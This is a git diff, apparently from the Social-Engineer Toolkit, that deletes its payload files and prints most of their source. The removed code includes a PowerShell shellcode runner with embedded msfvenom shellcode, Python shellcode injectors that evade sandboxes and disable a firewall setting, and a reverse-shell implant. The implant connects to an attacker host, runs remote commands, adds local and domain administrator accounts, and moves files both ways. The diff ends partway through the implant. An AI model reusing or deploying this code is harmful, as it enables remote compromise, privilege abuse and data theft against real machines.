diff --git a/src/html/Signed_Update.jar.orig b/src/html/Signed_Update.jar.orig
index d186574f2..bc5e02bf0 100644
Binary files a/src/html/Signed_Update.jar.orig and b/src/html/Signed_Update.jar.orig differ
diff --git a/src/html/unsigned/unsigned.jar b/src/html/unsigned/unsigned.jar
index fa39096d9..14748f56f 100644
Binary files a/src/html/unsigned/unsigned.jar and b/src/html/unsigned/unsigned.jar differ
diff --git a/src/payloads/exe/shellcodeexec.binary b/src/payloads/exe/shellcodeexec.binary
deleted file mode 100755
index c2e6118fc..000000000
Binary files a/src/payloads/exe/shellcodeexec.binary and /dev/null differ
diff --git a/src/payloads/powershell/powershell_shellcode.code b/src/payloads/powershell/powershell_shellcode.code
deleted file mode 100644
index 2708fde7a..000000000
--- a/src/payloads/powershell/powershell_shellcode.code
+++ /dev/null
@@ -1,45 +0,0 @@
-<#
-Powershell Code Execution 'Exploit'
-Author: Matthew Graeber (aka my superhero infosec crush)
-Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions.
-#>
-
-# Import required functions
-$code = @"
-[DllImport("kernel32.dll")]
-public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
-[DllImport("kernel32.dll")]
-public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-[DllImport("msvcrt.dll")]
-public static extern IntPtr memset(IntPtr dest, uint src, uint count);
-"@
-
-# Add CSharp code as a class recognized by Powershell
-$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
-
-# Copy and paste your shellcode here in the form 0xXX.
-# 32-bit payload
-# msfvenom windows/exec CMD="cmd /k calc" EXITFUNC=thread
-[Byte[]]$sc32 = 
0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00
-
-# 64-bit payload
-# msfpayload windows/x64/exec CMD="cmd /k calc" EXITFUNC=thread
-[Byte[]]$sc64 = 
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00
-
-# Determine if Powershell is running as 32 or 64 bit
-[Byte[]]$sc = $sc32
-if ([IntPtr]::Size -eq 8) {$sc = $sc64}
-
-# Calculate correct size param for VirtualAlloc
-$size = 0x1000
-if ($sc.Length -gt 0x1000) {$size = $sc.Length}
-
-# Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000.
-# Allocate RWX memory block
-$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
-
-# I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. 
I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid).
-for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
-
-# Execute you payload
-$winFunc::CreateThread(0,0,$x,0,0,0)
diff --git a/src/payloads/ratte/ratte.binary b/src/payloads/ratte/ratte.binary
deleted file mode 100755
index 387a99a86..000000000
Binary files a/src/payloads/ratte/ratte.binary and /dev/null differ
diff --git a/src/payloads/set_payloads/downloader.windows b/src/payloads/set_payloads/downloader.windows
deleted file mode 100755
index e4f85644b..000000000
Binary files a/src/payloads/set_payloads/downloader.windows and /dev/null differ
diff --git a/src/payloads/set_payloads/multi_pyinjector.binary b/src/payloads/set_payloads/multi_pyinjector.binary
deleted file mode 100755
index 0d8158fce..000000000
Binary files a/src/payloads/set_payloads/multi_pyinjector.binary and /dev/null differ
diff --git a/src/payloads/set_payloads/multi_pyinjector.py b/src/payloads/set_payloads/multi_pyinjector.py
deleted file mode 100644
index ae1535df3..000000000
--- a/src/payloads/set_payloads/multi_pyinjector.py
+++ /dev/null
@@ -1,100 +0,0 @@
-#
-# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
-# Version: 0.4
-#
-# This will spawn only a seperate thread per each shellcode instance.
-#
-# Much cleaner and optimized code. No longer needs files and is passed via
-# command line.
-#
-# Incorporates AES 256 Encryption when passing shellcode
-
-import ctypes
-import sys
-import subprocess
-import os
-import base64
-from Crypto.Cipher import AES
-import multiprocessing
-import threading
-
-# added sandbox evasion here - most sandboxes use only 1 core
-if multiprocessing.cpu_count() < 2:
- exit()
-
-# define our shellcode injection code through ctypes
-
-
-def injection(sc):
- sc = sc.decode("string_escape")
- sc = bytearray(sc)
- # Initial awesome code and credit found here:
- # http://www.debasish.in/2012_04_01_archive.html
-
- ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
- ctypes.c_int(len(sc)),
- ctypes.c_int(0x3000),
- ctypes.c_int(0x40))
- ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
- ctypes.c_int(len(sc)))
- buf = (ctypes.c_char * len(sc)).from_buffer(sc)
- ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
- buf,
- ctypes.c_int(len(sc)))
- ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
- ctypes.c_int(0),
- ctypes.c_int(ptr),
- ctypes.c_int(0),
- ctypes.c_int(0),
- ctypes.pointer(ctypes.c_int(0)))
- ctypes.windll.kernel32.WaitForSingleObject(
- ctypes.c_int(ht), ctypes.c_int(-1))
-if __name__ == '__main__':
- multiprocessing.freeze_support()
- subprocess.Popen("netsh advfirewall set global StatefulFTP disable",
- stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
- # this will be our ultimate filename we use for the shellcode generate
- # by the Social-Engineer Toolkit
- try:
-
- # our file containing shellcode
- if len(sys.argv[1]) > 1:
- payload_filename = sys.argv[1]
- if os.path.isfile(payload_filename):
- fileopen = open(payload_filename, "r")
- sc = fileopen.read()
-
- # if we didn't file our 
shellcode path then exit out
- if not os.path.isfile(payload_filename):
- sys.exit()
-
- if len(sys.argv[2]) > 1:
- # this is our secret key for decrypting the AES encrypted traffic
- secret = sys.argv[2]
- secret = base64.b64decode(secret)
- # the character used for padding--with a block cipher such as AES, the value
- # you encrypt must be a multiple of BLOCK_SIZE in length. This character is
- # used to ensure that your value is always a multiple of BLOCK_SIZE
- PADDING = '{'
- BLOCK_SIZE = 32
- # one-liner to sufficiently pad the text to be encrypted
- pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
- # one-liners to decrypt a string which will be our shellcode
- DecryptAES = lambda c, e: c.decrypt(
- base64.b64decode(e)).rstrip(PADDING)
- cipher = AES.new(secret)
- # our decrypted value for shellcode
- sc = DecryptAES(cipher, sc)
- # split our shellcode into a list
- sc = sc.split(",")
-
- # except an indexerror and allow it to continue forward
- except IndexError:
- sys.exit()
-
- jobs = []
- for payload in sc:
- if payload != "":
- p = multiprocessing.Process(target=injection, args=(payload,))
- jobs.append(p)
- p.start()
diff --git a/src/payloads/set_payloads/pyinjector.binary b/src/payloads/set_payloads/pyinjector.binary
deleted file mode 100755
index 1ddd281f7..000000000
Binary files a/src/payloads/set_payloads/pyinjector.binary and /dev/null differ
diff --git a/src/payloads/set_payloads/pyinjector_args.py b/src/payloads/set_payloads/pyinjector_args.py
deleted file mode 100644
index 7a77ba686..000000000
--- a/src/payloads/set_payloads/pyinjector_args.py
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/usr/bin/python
-import ctypes
-import sys
-import multiprocessing
-
-# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
-# Injects shellcode into memory through Python and ctypes
-#
-# Initial awesome code and credit found here:
-# http://www.debasish.in/2012_04_01_archive.html
-
-# added sandbox evasion here - most sandboxes use only 1 core
-if multiprocessing.cpu_count() < 2:
- exit()
-
-# see if we specified shellcode
-try:
- sc = sys.argv[1]
-
-# if we didn't specify a param
-except IndexError:
- sys.exit()
-
-# need to code the input into the right format through string escape
-sc = sc.decode("string_escape")
-
-# convert to bytearray
-sc = bytearray(sc)
-
-# use types windll.kernel32 for virtualalloc reserves region of pages in
-# virtual address space
-ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
- ctypes.c_int(len(sc)),
- ctypes.c_int(0x3000),
- ctypes.c_int(0x40))
-
-# use virtuallock to lock region for physical address space
-ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
- ctypes.c_int(len(sc)))
-
-# read in the buffer
-buf = (ctypes.c_char * len(sc)).from_buffer(sc)
-
-# moved the memory in 4 byte blocks
-ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
- buf,
- ctypes.c_int(len(sc)))
-# launch in a thread
-ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
- ctypes.c_int(0),
- ctypes.c_int(ptr),
- ctypes.c_int(0),
- ctypes.c_int(0),
- ctypes.pointer(ctypes.c_int(0)))
-# waitfor singleobject
-ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
diff --git a/src/payloads/set_payloads/shell.py b/src/payloads/set_payloads/shell.py
deleted file mode 100644
index d1982eb4e..000000000
--- a/src/payloads/set_payloads/shell.py
+++ /dev/null
@@ -1,1297 +0,0 @@
-#!/usr/bin/env python
-from socket import *
-import subprocess
-import sys
-import os
-import base64
-import binascii
-import threading
-import select
-import thread
-import time
-import random
-import string
-import sys
-import logging
-import paramiko
-import tempfile
-import ctypes
-
-# detect if we're on windows
-if os.name == "nt":
- operating_system = "windows"
- import win32process
- import win32api
- import win32con
- import pythoncom
- import pyHook
- import win32security
- from ntsecuritycon import *
-
-# detect if we're on nix
-if os.name == "posix":
- operating_system = "posix"
-
-##########################################################################
-#
-# win32process is a third party module, will need to include it, download the windows binaries, be sure to use
-# python 2.5, pyinstaller doesn't like anything above it for the byte compiling.
-#
-# Note to get pyinstaller to work it was compiled under Python 2.5, be sure to install things manually and
-# not through Activestate.
-#
-# Download win32 modules needed for shell here:
-# http://sourceforge.net/projects/pywin32/files/pywin32/Build216/pywin32-216.win32-py2.5.exe/download
-#
-# You will also need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
-# to make it easier. Can download from here:
-# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
-#
-# Will need to download pyHooks from:
-# http://sourceforge.net/projects/pyhook/files/pyhook/1.5.1/pyHook-1.5.1.win32-py2.5.exe/download
-#
-# Be sure to pack it via UPX first in order for the UPX encoding to work properly within SET.
-#
-##########################################################################
-#
-#
-##########################################################################
-#
-# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
-# so py2exe was not used. 
Instead, pyinstaller was used in order to byte compile the binary.
-#
-# Remember to use Python 2.5 for Windows, nothing above and don't use ActiveState, things break.
-#
-##########################################################################
-#
-#
-##########################################################################
-#
-# For OSX installation, install ActiveState Python 2.7 and type:
-#
-# sudo pypm install paramiko
-#
-# You will then need to go into Configure.py in pyinstaller and look for "64bit". Change it to
-# something garbage like dsifsdfidsfdshfois. This is a bug if it detects OSX in 64bit it will
-# completely bomb. We fix it with the export VERSIONER below but it was still causing issues.
-# Changing the 64bit thing will fix it completely.
-#
-# You will also need to edit Build.py, search for return '64bit' and change to return '32bit'.
-# Another bug for detection.
-#
-# Then create a bash script and run the below from the command line:
-#
-# export VERSIONER_PYTHON_PREFER_32_BIT=yes
-# python Configure.py
-# python Makespec.py --onefile --noconsole shell.py
-# python Build.py shell/shell.spec
-#
-#
-# This will allow you to compile the shell via pyinstaller for OSX
-#
-# On LINUX it's easy just use pyinstaller ensure paramiko is installed
-#
-##########################################################################
-#
-#
-##########################################################################
-#
-# download pyinstaller from: http://www.pyinstaller.org/
-#
-# Make sure your using python2.5, anything above gets buggy.
-#
-# Make sure you have win32api, paramiko, pycrypto python modules installed
-#
-# Ensure to install pyinstaller 1.4, 1.5 is buggy. 
-#
-# Unzip: and run the following commands on the shell.py file
-#
-# python Configure.py
-# python Makespec.py --onefile --noconsole shell.py
-# python Build.py shell\shell.spec
-#
-##########################################################################
-
-verbose = True
-
-# random value here to randomize builds
-a = 50 * 5
-
-# try block here
-try:
- # check for an ip address file if we aren't feeding it
- temp = tempfile.gettempdir() # prints the current temporary directory
- if os.path.isfile(temp + "/42logfile42.tmp"):
- fileopen = open(temp + "/42logfile42.tmp", "r")
- data = fileopen.read()
- data = data.split(" ")
- ipaddr = data[0]
- port = data[1]
- try:
- os.remove(temp + "/42logfile42.tmp")
- except:
- pass
- # create a socket object
- sockobj = socket(AF_INET, SOCK_STREAM)
- # parse the textfile
- sockobj.connect((ipaddr, int(port)))
-
- if not os.path.isfile(temp + "/42logfile42.tmp"):
- # create a socket object
- sockobj = socket(AF_INET, SOCK_STREAM)
- # parse command line arguments one and two. First is IP, second is port
- sockobj.connect((sys.argv[1], int(sys.argv[2])))
-
-# except index error which means user didn't specify IP and port
-except IndexError:
- # send error message
- # if verbose == True:
- print("\nThe Social-Engineer Toolkit Basic Shell\n\nSyntax: shell.exe ")
- # exit the program
- sys.exit()
-
-# except Exception
-except Exception as e:
- if verbose == True:
- print(e)
-
- # sleep 10 seconds and try to connect again
- try:
- time.sleep(10)
- # create a socket object
- sockobj = socket(AF_INET, SOCK_STREAM)
-
- # parse command line arguments one and two. First is IP, second is port
- sockobj.connect((sys.argv[1], int(sys.argv[2])))
-
- # wait 10 more and try again
- time.sleep(10)
-
- # create a socket object
- sockobj = socket(AF_INET, SOCK_STREAM)
-
- # parse command line arguments one and two. 
First is IP, second is port
- sockobj.connect((sys.argv[1], int(sys.argv[2])))
-
- # if not give up
- except Exception as e:
- if verbose == True:
- print(e)
- sys.exit()
-
-# tell SET we are the interactive shell
-# if we're nix
-if operating_system == "windows":
- send_string = "IHAYYYYYIAMSETANDIAMWINDOWS"
-# if we're nix
-if operating_system == "posix":
- send_string = "IHAYYYYYIAMSETANDIAMPOSIXXX"
-sockobj.send(send_string)
-
-# generate random strings
-
-
-def generate_random_string(low, high):
- length = random.randint(low, high)
- letters = string.ascii_letters + string.digits
- return ''.join([random.choice(letters) for _ in range(length)])
- rand_gen = random_string()
- return rand_gen
-
-# this is what we use to either encrypt or not encrypt
-
-
-def send_packet(message, sockobj, encryption, cipher):
-
- # if we encrypt or not
- if encryption == 1:
-
- # we encrypt our output here
- encoded = EncodeAES(cipher, message)
- # we take the length of the encrypted string
- normal_size = len(encoded)
- # we turn the length of our string into a string literal
- normal_size = str(normal_size)
- # we encrypt our string literal
- normal_size_crypt = EncodeAES(cipher, normal_size)
- # we send our encrypted string literal to let our server know how long our
- # true encrypted string is
- sockobj.sendall(normal_size_crypt)
- # we send our encrypted string
- time.sleep(0.5)
- sockobj.sendall(encoded)
-
- # if 0 then don't encrypt
- if encryption == 0:
- normal_size = str(len(message))
- message = str(message)
- sockobj.send(normal_size)
- sockobj.send(str(message))
-
-# decrypt packet routine
-
-
-def decrypt_packet(message, encryption, cipher):
-
- # if we support encryption
- if encryption == 1:
- return DecodeAES(cipher, message)
-
- # if we don't support encryption
- if encryption == 0:
-
- return message
-
-# receive file from the attacker machine
-
-
-def upload_file(filename):
-
- # define data as a received information from attacker machine
- data = 
sockobj.recv(1024)
-
- # decrypt the packet which will tell us length to be sent
- data = decrypt_packet(data, encryption, cipher)
-
- # this will be our encrypted filepath
- data = sockobj.recv(1024)
-
- # decrypted file path, not needed here
- data = decrypt_packet(data, encryption, cipher)
-
- # specify file to write
- filewrite = open(filename, "wb")
-
- # this will be our length for our file
- data = sockobj.recv(1024)
-
- # decrypt the length of our file
- data = decrypt_packet(data, encryption, cipher)
-
- # here is an ugly hack but it works, basically we set two
- # counters. MSGLEN which will eventually equal the length
- # of what number was sent to us which represented the length
- # of the output of the shell command we executed. Dataout
- # will eventually equal the entire string loaded into our
- # buffer then sent for decryption.
- #
- # A loop is started which continues to receive until we hit
- # the length of what our entire full encrypted shell output
- # is equaled. Once that occurs, we are out of our loop and
- # the full string is sent to the decryption routine and
- # presented back to us. 
-
- MSGLEN = 0
- dataout = ""
- length = int(data)
- while MSGLEN != length:
- data = sockobj.recv(1024)
- dataout += data
- MSGLEN = MSGLEN + len(data)
-
- data = decrypt_packet(dataout, encryption, cipher)
- filewrite.write(data)
-
- # close file after write
- filewrite.close()
-
- # confirm its there
- if os.path.isfile(filename):
- send_packet("Confirmed", sockobj, encryption, cipher)
-
- # if its not then send back failed
- if not os.path.isfile(filename):
- send_packet("Failed", sockobj, encryption, cipher)
-
-# Note that this module does not come with pre-build binaries you will need either a compiler installed
-# on your Windows machine or download the binary blobs from here:
-# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
-
-from Crypto.Cipher import AES
-
-# set encryption key to 1
-encryption = 1
-
-# the block size for the cipher object; must be 16, 24, or 32 for AES
-BLOCK_SIZE = 32
-
-# the character used for padding--with a block cipher such as AES, the value
-# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
-# used to ensure that your value is always a multiple of BLOCK_SIZE
-PADDING = '{'
-
-# one-liner to sufficiently pad the text to be encrypted
-pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
-
-# random value here to randomize builds
-a = 50 * 5
-
-# one-liners to encrypt/encode and decrypt/decode a string
-# encrypt with AES, encode with base64
-EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
-DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
-
-#############################################
-#
-# Reboot Server Code through Native
-# API.
-#
-#############################################
-
-
-def AdjustPrivilege(priv, enable=1):
- # Get the process token
- flags = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
- htoken = win32security.OpenProcessToken(
- win32api.GetCurrentProcess(), flags)
- # Get the ID for the system shutdown privilege. 
- idd = win32security.LookupPrivilegeValue(None, priv)
- # Now obtain the privilege for this process.
- # Create a list of the privileges to be added.
- if enable:
- newPrivileges = [(idd, SE_PRIVILEGE_ENABLED)]
- else:
- newPrivileges = [(idd, 0)]
- # and make the adjustment
- win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges)
-
-
-def RebootServer(message='Rebooting', timeout=0, bForce=0, bReboot=1):
- AdjustPrivilege(SE_SHUTDOWN_NAME)
- try:
- win32api.InitiateSystemShutdown(
- None, message, timeout, bForce, bReboot)
- finally:
- # Now we remove the privilege we just added.
- AdjustPrivilege(SE_SHUTDOWN_NAME, 0)
-
-
-def AbortReboot():
- AdjustPrivilege(SE_SHUTDOWN_NAME)
- try:
- win32api.AbortSystemShutdown(None)
- finally:
- AdjustPrivilege(SE_SHUTDOWN_NAME, 0)
-
-
-########################################
-#
-# Start Paramiko Code here
-#
-########################################
-
-def handler(chan, host, port):
- sock = socket()
- try:
- sock.connect((host, port))
-
- except Exception as e:
- if verbose == True:
- print(e)
- return
-
- while True:
- r, w, x = select.select([sock, chan], [], [])
- if sock in r:
- data = sock.recv(1024)
- if len(data) == 0:
- break
- chan.send(data)
- if chan in r:
- data = chan.recv(1024)
- if len(data) == 0:
- break
- sock.send(data)
- chan.close()
- sock.close()
-
-# here is where we start the transport request for port forward on victim
-# then tunnel over via thread and handler
-
-
-def reverse_forward_tunnel(server_port, remote_host, remote_port, transport):
-
- transport.request_port_forward('', server_port)
- # while we accept transport via thread handler continue loop
- while True:
- chan = transport.accept(1000)
- if chan is None:
- continue
- # define thread
- thr = threading.Thread(target=handler, args=(
- chan, remote_host, remote_port))
- # set thread as daemon
- thr.setDaemon(True)
- # start thread
- thr.start()
-
-########################################
-#
-# End Paramiko Code here
-#
-########################################
-
-# main outside loop for the shell
-try:
-
- while 1:
-
- # second inside loop
- while 1:
-
- # receive socket connection from attacker
- data = sockobj.recv(1024)
-
- if data == "quit" or data == "":
- sys.exit()
-
- # if the length is 52 then we support encryption
- if len(data) == 52:
- encryption = 1
- sockobj.send(data)
- data = sockobj.recv(1024)
- data = binascii.unhexlify(data)
- secret = data
- cipher = AES.new(secret)
- break
-
- # if the length is 51 then we don't support encryption
- if len(data) == 51:
- # if we don't support encryption then break out
- cipher = ""
- sockobj.send(data)
- encryption = 0
- break
-
- # while true loop forever
- while 1:
-
- # define data as a received information from attacker machine
- data = sockobj.recv(1024)
-
- # decrypt the packet which will tell us length to be sent
- data = decrypt_packet(data, encryption, cipher)
-
- # leverage the previous data socket connection as our length for
- # our next socket
- data = sockobj.recv(int(data))
-
- # this will be our actual data packet
- data = decrypt_packet(data, encryption, cipher)
-
- # if data == quit or exit break out of main loop and renegotiate
- # encryption
- if data == "quit" or data == "exit":
- break
-
- # if the attacker specifies a command shell lets get it ready
- if data == "shell":
- # specify another while loop to put us into the subprocess
- # commands
- while 1:
-
- # try block
- try:
-
- # define data as a received information from attacker
- # machine
- data = sockobj.recv(1024)
-
- # decrypt the packet which will tell us length to be
- # sent
- data = decrypt_packet(data, encryption, cipher)
-
- # leverage the previous data socket connection as our
- # length for our next socket
- data = sockobj.recv(int(data))
-
- # this will be our actual data packet
- data = decrypt_packet(data, encryption, cipher)
- # if we receive data 'exit' then break out of the loop
- # but keep socket alive
- if data == "exit" or 
data == "quit":
- data = ""
- # break out of the loop
- break
-
- # note that you have to do some funky stuff with stdout, stderr, and stdin,
- # when you use a non-console window subprocess bugs out (known since python
- # 2.5.1). You need to pipe all the channels out to subprocess.PIPE then
- # communicate with only stdout via proc.stdout.read() if not you will get a
- # major error when running the shell.
-
- # send our command that would be 'data'
- proc = subprocess.Popen(
- data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
-
- # communicate with stdout and send it back to attacker
- stdout_value = proc.stdout.read()
-
- # if we have an error just append to nothing if needed
- stdout_value += proc.stderr.read()
-
- # do the actual send
- send_packet(str(stdout_value) + "\r\n",
- sockobj, encryption, cipher)
-
- # except a keyboard interrupt shouldn't actually hit this
- # since we are using commands from attacker
- except KeyboardInterrupt:
-
- # close socket
- sockobj.close()
-
- # exit
- sys.exit()
-
- # except all other errors
- except Exception as e:
- if verbose == True:
- print(e)
- # pass through them
- pass
-
- # this section adds a local admin on the local system
- if data == "localadmin":
- try:
-
- # define data as a received information from attacker
- # machine
- data = sockobj.recv(1024)
-
- # decrypt the packet which will tell us length to be sent
- data = decrypt_packet(data, encryption, cipher)
-
- # leverage the previous data socket connection as our
- # length for our next socket
- data = sockobj.recv(int(data))
-
- # this will be our actual data packet
- data = decrypt_packet(data, encryption, cipher)
-
- # split the data sent, should be seperated by a command ","
- # which splits into a tuple
- data = data.split(",")
-
- # this initiates subprocess.Popen as a shell command and
- # uses net user to add a local user account initally
- # locally
- proc = subprocess.Popen("net user %s %s /ADD" % (data[0], 
data[
- 1]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
-
- # this initiates subprocess.Popen as a shell command and
- # uses net localgroup to add a local administrator
- proc = subprocess.Popen("net localgroup administrators %s /ADD" % (
- data[0]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
-
- # except exception
- except Exception as e:
- if verbose == True:
- print(e)
- pass
-
- # this section adds a domain admin on the local system
- if data == "domainadmin":
- try:
-
- # define data as a received information from attacker
- # machine
- data = sockobj.recv(1024)
-
- # decrypt the packet which will tell us length to be sent
- data = decrypt_packet(data, encryption, cipher)
-
- # leverage the previous data socket connection as our
- # length for our next socket
- data = sockobj.recv(int(data))
-
- # this will be our actual data packet
- data = decrypt_packet(data, encryption, cipher)
-
- # split the data sent, should be seperated by a command ","
- # which splits into a tuple
- data = data.split(",")
-
- # this initiates subprocess.Popen as a shell command and
- # uses net user to add a domain user account initially
- proc = subprocess.Popen("net user %s %s /ADD /DOMAIN" % (data[0], data[
- 1]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
-
- # this initiates subprocess.Popen as a shell command and
- # uses net group to add to domain admins
- proc = subprocess.Popen('net group "Domain Admins" %s /ADD /DOMAIN' % (
- data[0]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait()
-
- # except errors and don't pass them yet, will add to logging
- # later
- except Exception as e:
- if verbose == True:
- print(e)
- pass
-
- # this section is if the attacker wants to download a file
- if data == "downloadfile":
- try:
-
- # define data as a received information from attacker
- # machine
- data 
= sockobj.recv(1024)
-
- # decrypt the packet which will tell us length to be sent
- data = decrypt_packet(data, encryption, cipher)
-
- # leverage the previous data socket connection as our length for our next socket
- # data=sockobj.recv(int(data))
-
- data = sockobj.recv(1024)
-
- # this will be our actual data packet
- download = decrypt_packet(data, encryption, cipher)
-
- # if the file isn't there let the listener know
- if not os.path.isfile(download):
- # send that the file isn't found
- send_packet("File not found.", sockobj,
- encryption, cipher)
-
- # if the file is there then cycle through it and let the
- # listener know
- if os.path.isfile(download):
- # open the file for read/binary
- fileopen = open(download, "rb")
- data_file = ""
- # while data send socket per line
- for data in fileopen:
- data_file += data
- send_packet(data_file, sockobj, encryption, cipher)
-
- # except exception
- except Exception as e:
- if verbose == True:
- print(e)
- pass
-
- # this section is if the attacker wants to upload a file
- if data == "uploadfile":
- # try block
- try:
-
- # define data as a received information from attacker
- # machine
- data = sockobj.recv(1024)
-
- # decrypt the packet which will tell us length to be sent
- data = decrypt_packet(data, encryption, cipher)
-
- # this will be our encrypted filepath
- data = sockobj.recv(1024)
-
- # decrypted file path
- data = decrypt_packet(data, encryption, cipher)
-
- upload_path = data
-
- # specify file to write
- filewrite = open(upload_path, "wb")
-
- # this will be our length for our file
- data = sockobj.recv(1024)
-
- # decrypt the length of our file
- data = decrypt_packet(data, encryption, cipher)
-
- # here is an ugly hack but it works, basically we set two
- # counters. MSGLEN which will eventually equal the length
- # of what number was sent to us which represented the length
- # of the output of the shell command we executed. 
Dataout
- # will eventually equal the entire string loaded into our
- # buffer then sent for decryption.
- #
